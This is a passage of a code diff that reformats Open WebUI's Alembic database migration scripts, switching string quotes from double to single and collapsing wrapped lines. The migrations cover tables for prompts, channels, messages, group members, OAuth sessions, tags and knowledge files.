sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.String()), + sa.column('name', sa.Text()), + sa.column('created_at', sa.BigInteger()), + sa.column('user_id', sa.Text()), + sa.column('content', sa.Text()), + sa.column('access_control', sa.JSON()), ) try: @@ -195,31 +195,31 @@ def downgrade() -> None: current_data = [] # Step 2: Drop history and table - op.drop_table("prompt_history") - op.drop_table("prompt") + op.drop_table('prompt_history') + op.drop_table('prompt') # Step 3: Recreate old table (command as PK?) # Assuming old schema: op.create_table( - "prompt", - sa.Column("command", sa.String(), primary_key=True), - sa.Column("user_id", sa.String()), - sa.Column("title", sa.Text()), - sa.Column("content", sa.Text()), - sa.Column("timestamp", sa.BigInteger()), - sa.Column("access_control", sa.JSON()), - sa.Column("id", sa.Integer(), nullable=True), + 'prompt', + sa.Column('command', sa.String(), primary_key=True), + sa.Column('user_id', sa.String()), + sa.Column('title', sa.Text()), + sa.Column('content', sa.Text()), + sa.Column('timestamp', sa.BigInteger()), + sa.Column('access_control', sa.JSON()), + sa.Column('id', sa.Integer(), nullable=True), ) # Step 4: Restore data old_prompt_table = sa.table( - "prompt", - sa.column("command", sa.String()), - sa.column("user_id", sa.String()), - sa.column("title", sa.Text()), - sa.column("content", sa.Text()), - sa.column("timestamp", sa.BigInteger()), - sa.column("access_control", sa.JSON()), + 'prompt', + sa.column('command', sa.String()), + sa.column('user_id', sa.String()), + sa.column('title', sa.Text()), + sa.column('content', sa.Text()), + sa.column('timestamp', sa.BigInteger()), + sa.column('access_control', sa.JSON()), ) for row in current_data: @@ -231,9 +231,7 @@ def downgrade() -> None: access_control = row[5] # Restore leading / - old_command = ( - "/" + command if command and not command.startswith("/") else command - ) + old_command = '/' + command if command and not command.startswith('/') else command conn.execute( sa.insert(old_prompt_table).values(
backend/open_webui/migrations/versions/3781e22d8b01_update_message_table.py+21 −33 modified@@ -9,62 +9,50 @@ from alembic import op import sqlalchemy as sa -revision = "3781e22d8b01" -down_revision = "7826ab40b532" +revision = '3781e22d8b01' +down_revision = '7826ab40b532' branch_labels = None depends_on = None def upgrade(): # Add 'type' column to the 'channel' table op.add_column( - "channel", + 'channel', sa.Column( - "type", + 'type', sa.Text(), nullable=True, ), ) # Add 'parent_id' column to the 'message' table for threads op.add_column( - "message", - sa.Column("parent_id", sa.Text(), nullable=True), + 'message', + sa.Column('parent_id', sa.Text(), nullable=True), ) op.create_table( - "message_reaction", - sa.Column( - "id", sa.Text(), nullable=False, primary_key=True, unique=True - ), # Unique reaction ID - sa.Column("user_id", sa.Text(), nullable=False), # User who reacted - sa.Column( - "message_id", sa.Text(), nullable=False - ), # Message that was reacted to - sa.Column( - "name", sa.Text(), nullable=False - ), # Reaction name (e.g. "thumbs_up") - sa.Column( - "created_at", sa.BigInteger(), nullable=True - ), # Timestamp of when the reaction was added + 'message_reaction', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), # Unique reaction ID + sa.Column('user_id', sa.Text(), nullable=False), # User who reacted + sa.Column('message_id', sa.Text(), nullable=False), # Message that was reacted to + sa.Column('name', sa.Text(), nullable=False), # Reaction name (e.g. "thumbs_up") + sa.Column('created_at', sa.BigInteger(), nullable=True), # Timestamp of when the reaction was added ) op.create_table( - "channel_member", - sa.Column( - "id", sa.Text(), nullable=False, primary_key=True, unique=True - ), # Record ID for the membership row - sa.Column("channel_id", sa.Text(), nullable=False), # Associated channel - sa.Column("user_id", sa.Text(), nullable=False), # Associated user - sa.Column( - "created_at", sa.BigInteger(), nullable=True - ), # Timestamp of when the user joined the channel + 'channel_member', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), # Record ID for the membership row + sa.Column('channel_id', sa.Text(), nullable=False), # Associated channel + sa.Column('user_id', sa.Text(), nullable=False), # Associated user + sa.Column('created_at', sa.BigInteger(), nullable=True), # Timestamp of when the user joined the channel ) def downgrade(): # Revert 'type' column addition to the 'channel' table - op.drop_column("channel", "type") - op.drop_column("message", "parent_id") - op.drop_table("message_reaction") - op.drop_table("channel_member") + op.drop_column('channel', 'type') + op.drop_column('message', 'parent_id') + op.drop_table('message_reaction') + op.drop_table('channel_member')
backend/open_webui/migrations/versions/37f288994c47_add_group_member_table.py+41 −49 modified@@ -15,59 +15,57 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "37f288994c47" -down_revision: Union[str, None] = "a5c220713937" +revision: str = '37f288994c47' +down_revision: Union[str, None] = 'a5c220713937' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # 1. Create new table op.create_table( - "group_member", - sa.Column("id", sa.Text(), primary_key=True, unique=True, nullable=False), + 'group_member', + sa.Column('id', sa.Text(), primary_key=True, unique=True, nullable=False), sa.Column( - "group_id", + 'group_id', sa.Text(), - sa.ForeignKey("group.id", ondelete="CASCADE"), + sa.ForeignKey('group.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "user_id", + 'user_id', sa.Text(), - sa.ForeignKey("user.id", ondelete="CASCADE"), + sa.ForeignKey('user.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.UniqueConstraint("group_id", "user_id", name="uq_group_member_group_user"), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.UniqueConstraint('group_id', 'user_id', name='uq_group_member_group_user'), ) connection = op.get_bind() # 2. Read existing group with user_ids JSON column group_table = sa.Table( - "group", + 'group', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_ids", sa.JSON()), # JSON stored as text in SQLite + PG + sa.Column('id', sa.Text()), + sa.Column('user_ids', sa.JSON()), # JSON stored as text in SQLite + PG ) - results = connection.execute( - sa.select(group_table.c.id, group_table.c.user_ids) - ).fetchall() + results = connection.execute(sa.select(group_table.c.id, group_table.c.user_ids)).fetchall() print(results) # 3. Insert members into group_member table gm_table = sa.Table( - "group_member", + 'group_member', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("group_id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('id', sa.Text()), + sa.Column('group_id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) now = int(time.time()) @@ -86,11 +84,11 @@ def upgrade() -> None: rows = [ { - "id": str(uuid.uuid4()), - "group_id": group_id, - "user_id": uid, - "created_at": now, - "updated_at": now, + 'id': str(uuid.uuid4()), + 'group_id': group_id, + 'user_id': uid, + 'created_at': now, + 'updated_at': now, } for uid in user_ids ] @@ -99,47 +97,41 @@ def upgrade() -> None: connection.execute(gm_table.insert(), rows) # 4. Optionally drop the old column - with op.batch_alter_table("group") as batch: - batch.drop_column("user_ids") + with op.batch_alter_table('group') as batch: + batch.drop_column('user_ids') def downgrade(): # Reverse: restore user_ids column - with op.batch_alter_table("group") as batch: - batch.add_column(sa.Column("user_ids", sa.JSON())) + with op.batch_alter_table('group') as batch: + batch.add_column(sa.Column('user_ids', sa.JSON())) connection = op.get_bind() gm_table = sa.Table( - "group_member", + 'group_member', sa.MetaData(), - sa.Column("group_id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('group_id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) group_table = sa.Table( - "group", + 'group', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_ids", sa.JSON()), + sa.Column('id', sa.Text()), + sa.Column('user_ids', sa.JSON()), ) # Build JSON arrays again results = connection.execute(sa.select(group_table.c.id)).fetchall() for (group_id,) in results: - members = connection.execute( - sa.select(gm_table.c.user_id).where(gm_table.c.group_id == group_id) - ).fetchall() + members = connection.execute(sa.select(gm_table.c.user_id).where(gm_table.c.group_id == group_id)).fetchall() member_ids = [m[0] for m in members] - connection.execute( - group_table.update() - .where(group_table.c.id == group_id) - .values(user_ids=member_ids) - ) + connection.execute(group_table.update().where(group_table.c.id == group_id).values(user_ids=member_ids)) # Drop the new table - op.drop_table("group_member") + op.drop_table('group_member')
backend/open_webui/migrations/versions/38d63c18f30f_add_oauth_session_table.py+30 −34 modified@@ -12,68 +12,64 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "38d63c18f30f" -down_revision: Union[str, None] = "3af16a1c9fb6" +revision: str = '38d63c18f30f' +down_revision: Union[str, None] = '3af16a1c9fb6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Ensure 'id' column in 'user' table is unique and primary key (ForeignKey constraint) inspector = sa.inspect(op.get_bind()) - columns = inspector.get_columns("user") + columns = inspector.get_columns('user') - pk_columns = inspector.get_pk_constraint("user")["constrained_columns"] - id_column = next((col for col in columns if col["name"] == "id"), None) + pk_columns = inspector.get_pk_constraint('user')['constrained_columns'] + id_column = next((col for col in columns if col['name'] == 'id'), None) - if id_column and not id_column.get("unique", False): - unique_constraints = inspector.get_unique_constraints("user") - unique_columns = {tuple(u["column_names"]) for u in unique_constraints} + if id_column and not id_column.get('unique', False): + unique_constraints = inspector.get_unique_constraints('user') + unique_columns = {tuple(u['column_names']) for u in unique_constraints} - with op.batch_alter_table("user") as batch_op: + with op.batch_alter_table('user') as batch_op: # If primary key is wrong, drop it - if pk_columns and pk_columns != ["id"]: - batch_op.drop_constraint( - inspector.get_pk_constraint("user")["name"], type_="primary" - ) + if pk_columns and pk_columns != ['id']: + batch_op.drop_constraint(inspector.get_pk_constraint('user')['name'], type_='primary') # Add unique constraint if missing - if ("id",) not in unique_columns: - batch_op.create_unique_constraint("uq_user_id", ["id"]) + if ('id',) not in unique_columns: + batch_op.create_unique_constraint('uq_user_id', ['id']) # Re-create correct primary key - batch_op.create_primary_key("pk_user_id", ["id"]) + batch_op.create_primary_key('pk_user_id', ['id']) # Create oauth_session table op.create_table( - "oauth_session", - sa.Column("id", sa.Text(), primary_key=True, nullable=False, unique=True), + 'oauth_session', + sa.Column('id', sa.Text(), primary_key=True, nullable=False, unique=True), sa.Column( - "user_id", + 'user_id', sa.Text(), - sa.ForeignKey("user.id", ondelete="CASCADE"), + sa.ForeignKey('user.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("provider", sa.Text(), nullable=False), - sa.Column("token", sa.Text(), nullable=False), - sa.Column("expires_at", sa.BigInteger(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('provider', sa.Text(), nullable=False), + sa.Column('token', sa.Text(), nullable=False), + sa.Column('expires_at', sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) # Create indexes for better performance - op.create_index("idx_oauth_session_user_id", "oauth_session", ["user_id"]) - op.create_index("idx_oauth_session_expires_at", "oauth_session", ["expires_at"]) - op.create_index( - "idx_oauth_session_user_provider", "oauth_session", ["user_id", "provider"] - ) + op.create_index('idx_oauth_session_user_id', 'oauth_session', ['user_id']) + op.create_index('idx_oauth_session_expires_at', 'oauth_session', ['expires_at']) + op.create_index('idx_oauth_session_user_provider', 'oauth_session', ['user_id', 'provider']) def downgrade() -> None: # Drop indexes first - op.drop_index("idx_oauth_session_user_provider", table_name="oauth_session") - op.drop_index("idx_oauth_session_expires_at", table_name="oauth_session") - op.drop_index("idx_oauth_session_user_id", table_name="oauth_session") + op.drop_index('idx_oauth_session_user_provider', table_name='oauth_session') + op.drop_index('idx_oauth_session_expires_at', table_name='oauth_session') + op.drop_index('idx_oauth_session_user_id', table_name='oauth_session') # Drop the table - op.drop_table("oauth_session") + op.drop_table('oauth_session')
backend/open_webui/migrations/versions/3ab32c4b8f59_update_tags.py+27 −30 modified@@ -13,8 +13,8 @@ import json -revision = "3ab32c4b8f59" -down_revision = "1af9b942657b" +revision = '3ab32c4b8f59' +down_revision = '1af9b942657b' branch_labels = None depends_on = None @@ -24,58 +24,55 @@ def upgrade(): inspector = Inspector.from_engine(conn) # Inspecting the 'tag' table constraints and structure - existing_pk = inspector.get_pk_constraint("tag") - unique_constraints = inspector.get_unique_constraints("tag") - existing_indexes = inspector.get_indexes("tag") + existing_pk = inspector.get_pk_constraint('tag') + unique_constraints = inspector.get_unique_constraints('tag') + existing_indexes = inspector.get_indexes('tag') - print(f"Primary Key: {existing_pk}") - print(f"Unique Constraints: {unique_constraints}") - print(f"Indexes: {existing_indexes}") + print(f'Primary Key: {existing_pk}') + print(f'Unique Constraints: {unique_constraints}') + print(f'Indexes: {existing_indexes}') - with op.batch_alter_table("tag", schema=None) as batch_op: + with op.batch_alter_table('tag', schema=None) as batch_op: # Drop existing primary key constraint if it exists - if existing_pk and existing_pk.get("constrained_columns"): - pk_name = existing_pk.get("name") + if existing_pk and existing_pk.get('constrained_columns'): + pk_name = existing_pk.get('name') if pk_name: - print(f"Dropping primary key constraint: {pk_name}") - batch_op.drop_constraint(pk_name, type_="primary") + print(f'Dropping primary key constraint: {pk_name}') + batch_op.drop_constraint(pk_name, type_='primary') # Now create the new primary key with the combination of 'id' and 'user_id' print("Creating new primary key with 'id' and 'user_id'.") - batch_op.create_primary_key("pk_id_user_id", ["id", "user_id"]) + batch_op.create_primary_key('pk_id_user_id', ['id', 'user_id']) # Drop unique constraints that could conflict with the new primary key for constraint in unique_constraints: if ( - constraint["name"] == "uq_id_user_id" + constraint['name'] == 'uq_id_user_id' ): # Adjust this name according to what is actually returned by the inspector - print(f"Dropping unique constraint: {constraint['name']}") - batch_op.drop_constraint(constraint["name"], type_="unique") + print(f'Dropping unique constraint: {constraint["name"]}') + batch_op.drop_constraint(constraint['name'], type_='unique') for index in existing_indexes: - if index["unique"]: - if not any( - constraint["name"] == index["name"] - for constraint in unique_constraints - ): + if index['unique']: + if not any(constraint['name'] == index['name'] for constraint in unique_constraints): # You are attempting to drop unique indexes - print(f"Dropping unique index: {index['name']}") - batch_op.drop_index(index["name"]) + print(f'Dropping unique index: {index["name"]}') + batch_op.drop_index(index['name']) def downgrade(): conn = op.get_bind() inspector = Inspector.from_engine(conn) - current_pk = inspector.get_pk_constraint("tag") + current_pk = inspector.get_pk_constraint('tag') - with op.batch_alter_table("tag", schema=None) as batch_op: + with op.batch_alter_table('tag', schema=None) as batch_op: # Drop the current primary key first, if it matches the one we know we added in upgrade - if current_pk and "pk_id_user_id" == current_pk.get("name"): - batch_op.drop_constraint("pk_id_user_id", type_="primary") + if current_pk and 'pk_id_user_id' == current_pk.get('name'): + batch_op.drop_constraint('pk_id_user_id', type_='primary') # Restore the original primary key - batch_op.create_primary_key("pk_id", ["id"]) + batch_op.create_primary_key('pk_id', ['id']) # Since primary key on just 'id' is restored, we now add back any unique constraints if necessary - batch_op.create_unique_constraint("uq_id_user_id", ["id", "user_id"]) + batch_op.create_unique_constraint('uq_id_user_id', ['id', 'user_id'])
backend/open_webui/migrations/versions/3af16a1c9fb6_update_user_table.py+10 −10 modified@@ -12,21 +12,21 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "3af16a1c9fb6" -down_revision: Union[str, None] = "018012973d35" +revision: str = '3af16a1c9fb6' +down_revision: Union[str, None] = '018012973d35' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: - op.add_column("user", sa.Column("username", sa.String(length=50), nullable=True)) - op.add_column("user", sa.Column("bio", sa.Text(), nullable=True)) - op.add_column("user", sa.Column("gender", sa.Text(), nullable=True)) - op.add_column("user", sa.Column("date_of_birth", sa.Date(), nullable=True)) + op.add_column('user', sa.Column('username', sa.String(length=50), nullable=True)) + op.add_column('user', sa.Column('bio', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('gender', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('date_of_birth', sa.Date(), nullable=True)) def downgrade() -> None: - op.drop_column("user", "username") - op.drop_column("user", "bio") - op.drop_column("user", "gender") - op.drop_column("user", "date_of_birth") + op.drop_column('user', 'username') + op.drop_column('user', 'bio') + op.drop_column('user', 'gender') + op.drop_column('user', 'date_of_birth')
backend/open_webui/migrations/versions/3e0e00844bb0_add_knowledge_file_table.py+50 −58 modified@@ -18,74 +18,72 @@ import uuid # revision identifiers, used by Alembic. -revision: str = "3e0e00844bb0" -down_revision: Union[str, None] = "90ef40d4714e" +revision: str = '3e0e00844bb0' +down_revision: Union[str, None] = '90ef40d4714e' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "knowledge_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'knowledge_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "knowledge_id", + 'knowledge_id', sa.Text(), - sa.ForeignKey("knowledge.id", ondelete="CASCADE"), + sa.ForeignKey('knowledge.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_knowledge_file_knowledge_id", "knowledge_id"), - sa.Index("ix_knowledge_file_file_id", "file_id"), - sa.Index("ix_knowledge_file_user_id", "user_id"), + sa.Index('ix_knowledge_file_knowledge_id', 'knowledge_id'), + sa.Index('ix_knowledge_file_file_id', 'file_id'), + sa.Index('ix_knowledge_file_user_id', 'user_id'), # unique constraints sa.UniqueConstraint( - "knowledge_id", "file_id", name="uq_knowledge_file_knowledge_file" + 'knowledge_id', 'file_id', name='uq_knowledge_file_knowledge_file' ), # prevent duplicate entries ) connection = op.get_bind() # 2. Read existing group with user_ids JSON column knowledge_table = sa.Table( - "knowledge", + 'knowledge', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("data", sa.JSON()), # JSON stored as text in SQLite + PG + sa.Column('id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('data', sa.JSON()), # JSON stored as text in SQLite + PG ) results = connection.execute( - sa.select( - knowledge_table.c.id, knowledge_table.c.user_id, knowledge_table.c.data - ) + sa.select(knowledge_table.c.id, knowledge_table.c.user_id, knowledge_table.c.data) ).fetchall() # 3. Insert members into group_member table kf_table = sa.Table( - "knowledge_file", + 'knowledge_file', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("knowledge_id", sa.Text()), - sa.Column("file_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('knowledge_id', sa.Text()), + sa.Column('file_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) file_table = sa.Table( - "file", + 'file', sa.MetaData(), - sa.Column("id", sa.Text()), + sa.Column('id', sa.Text()), ) now = int(time.time()) @@ -102,50 +100,48 @@ def upgrade() -> None: if not isinstance(data, dict): continue - file_ids = data.get("file_ids", []) + file_ids = data.get('file_ids', []) for file_id in file_ids: - file_exists = connection.execute( - sa.select(file_table.c.id).where(file_table.c.id == file_id) - ).fetchone() + file_exists = connection.execute(sa.select(file_table.c.id).where(file_table.c.id == file_id)).fetchone() if not file_exists: continue # skip non-existing files row = { - "id": str(uuid.uuid4()), - "user_id": user_id, - "knowledge_id": knowledge_id, - "file_id": file_id, - "created_at": now, - "updated_at": now, + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'knowledge_id': knowledge_id, + 'file_id': file_id, + 'created_at': now, + 'updated_at': now, } connection.execute(kf_table.insert().values(**row)) - with op.batch_alter_table("knowledge") as batch: - batch.drop_column("data") + with op.batch_alter_table('knowledge') as batch: + batch.drop_column('data') def downgrade() -> None: # 1. Add back the old data column - op.add_column("knowledge", sa.Column("data", sa.JSON(), nullable=True)) + op.add_column('knowledge', sa.Column('data', sa.JSON(), nullable=True)) connection = op.get_bind() # 2. Read knowledge_file entries and reconstruct data JSON knowledge_table = sa.Table( - "knowledge", + 'knowledge', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("data", sa.JSON()), + sa.Column('id', sa.Text()), + sa.Column('data', sa.JSON()), ) kf_table = sa.Table( - "knowledge_file", + 'knowledge_file', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("knowledge_id", sa.Text()), - sa.Column("file_id", sa.Text()), + sa.Column('id', sa.Text()), + sa.Column('knowledge_id', sa.Text()), + sa.Column('file_id', sa.Text()), ) results = connection.execute(sa.select(knowledge_table.c.id)).fetchall() @@ -157,13 +153,9 @@ def downgrade() -> None: file_ids_list = [fid for (fid,) in file_ids] - data_json = {"file_ids": file_ids_list} + data_json = {'file_ids': file_ids_list} - connection.execute( - knowledge_table.update() - .where(knowledge_table.c.id == knowledge_id) - .values(data=data_json) - ) + connection.execute(knowledge_table.update().where(knowledge_table.c.id == knowledge_id).values(data=data_json)) # 3. Drop the knowledge_file table - op.drop_table("knowledge_file") + op.drop_table('knowledge_file')
backend/open_webui/migrations/versions/4ace53fd72c8_update_folder_table_datetime.py+12 −12 modified@@ -9,56 +9,56 @@ from alembic import op import sqlalchemy as sa -revision = "4ace53fd72c8" -down_revision = "af906e964978" +revision = '4ace53fd72c8' +down_revision = 'af906e964978' branch_labels = None depends_on = None def upgrade(): # Perform safe alterations using batch operation - with op.batch_alter_table("folder", schema=None) as batch_op: + with op.batch_alter_table('folder', schema=None) as batch_op: # Step 1: Remove server defaults for created_at and updated_at batch_op.alter_column( - "created_at", + 'created_at', server_default=None, # Removing server default ) batch_op.alter_column( - "updated_at", + 'updated_at', server_default=None, # Removing server default ) # Step 2: Change the column types to BigInteger for created_at batch_op.alter_column( - "created_at", + 'created_at', type_=sa.BigInteger(), existing_type=sa.DateTime(), existing_nullable=False, - postgresql_using="extract(epoch from created_at)::bigint", # Conversion for PostgreSQL + postgresql_using='extract(epoch from created_at)::bigint', # Conversion for PostgreSQL ) # Change the column types to BigInteger for updated_at batch_op.alter_column( - "updated_at", + 'updated_at', type_=sa.BigInteger(), existing_type=sa.DateTime(), existing_nullable=False, - postgresql_using="extract(epoch from updated_at)::bigint", # Conversion for PostgreSQL + postgresql_using='extract(epoch from updated_at)::bigint', # Conversion for PostgreSQL ) def downgrade(): # Downgrade: Convert columns back to DateTime and restore defaults - with op.batch_alter_table("folder", schema=None) as batch_op: + with op.batch_alter_table('folder', schema=None) as batch_op: batch_op.alter_column( - "created_at", + 'created_at', type_=sa.DateTime(), existing_type=sa.BigInteger(), existing_nullable=False, server_default=sa.func.now(), # Restoring server default on downgrade ) batch_op.alter_column( - "updated_at", + 'updated_at', type_=sa.DateTime(), existing_type=sa.BigInteger(), existing_nullable=False,
backend/open_webui/migrations/versions/57c599a3cb57_add_channel_table.py+23 −23 modified@@ -9,40 +9,40 @@ from alembic import op import sqlalchemy as sa -revision = "57c599a3cb57" -down_revision = "922e7a387820" +revision = '57c599a3cb57' +down_revision = '922e7a387820' branch_labels = None depends_on = None def upgrade(): op.create_table( - "channel", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text()), - sa.Column("name", sa.Text()), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'channel', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text()), + sa.Column('name', sa.Text()), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) op.create_table( - "message", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text()), - sa.Column("channel_id", sa.Text(), nullable=True), - sa.Column("content", sa.Text()), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'message', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text()), + sa.Column('channel_id', sa.Text(), nullable=True), + sa.Column('content', sa.Text()), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) def downgrade(): - op.drop_table("channel") + op.drop_table('channel') - op.drop_table("message") + op.drop_table('message')
backend/open_webui/migrations/versions/6283dc0e4d8d_add_channel_file_table.py+16 −18 modified@@ -13,41 +13,39 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "6283dc0e4d8d" -down_revision: Union[str, None] = "3e0e00844bb0" +revision: str = '6283dc0e4d8d' +down_revision: Union[str, None] = '3e0e00844bb0' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "channel_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'channel_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "channel_id", + 'channel_id', sa.Text(), - sa.ForeignKey("channel.id", ondelete="CASCADE"), + sa.ForeignKey('channel.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_channel_file_channel_id", "channel_id"), - sa.Index("ix_channel_file_file_id", "file_id"), - sa.Index("ix_channel_file_user_id", "user_id"), + sa.Index('ix_channel_file_channel_id', 'channel_id'), + sa.Index('ix_channel_file_file_id', 'file_id'), + sa.Index('ix_channel_file_user_id', 'user_id'), # unique constraints - sa.UniqueConstraint( - "channel_id", "file_id", name="uq_channel_file_channel_file" - ), # prevent duplicate entries + sa.UniqueConstraint('channel_id', 'file_id', name='uq_channel_file_channel_file'), # prevent duplicate entries ) def downgrade() -> None: - op.drop_table("channel_file") + op.drop_table('channel_file')
backend/open_webui/migrations/versions/6a39f3d8e55c_add_knowledge_table.py+24 −24 modified@@ -11,37 +11,37 @@ from sqlalchemy.sql import table, column, select import json -revision = "6a39f3d8e55c" -down_revision = "c0fbf31ca0db" +revision = '6a39f3d8e55c' +down_revision = 'c0fbf31ca0db' branch_labels = None depends_on = None def upgrade(): # Creating the 'knowledge' table - print("Creating knowledge table") + print('Creating knowledge table') knowledge_table = op.create_table( - "knowledge", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'knowledge', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) - print("Migrating data from document table to knowledge table") + print('Migrating data from document table to knowledge table') # Representation of the existing 'document' table document_table = table( - "document", - column("collection_name", sa.String()), - column("user_id", sa.String()), - column("name", sa.String()), - column("title", sa.Text()), - column("content", sa.Text()), - column("timestamp", sa.BigInteger()), + 'document', + column('collection_name', sa.String()), + column('user_id', sa.String()), + column('name', sa.String()), + column('title', sa.Text()), + column('content', sa.Text()), + column('timestamp', sa.BigInteger()), ) # Select all from existing document table @@ -64,9 +64,9 @@ def upgrade(): user_id=doc.user_id, description=doc.name, meta={ - "legacy": True, - "document": True, - "tags": json.loads(doc.content or "{}").get("tags", []), + 'legacy': True, + 'document': True, + 'tags': json.loads(doc.content or '{}').get('tags', []), }, name=doc.title, created_at=doc.timestamp, @@ -76,4 +76,4 @@ def upgrade(): def downgrade(): - op.drop_table("knowledge") + op.drop_table('knowledge')
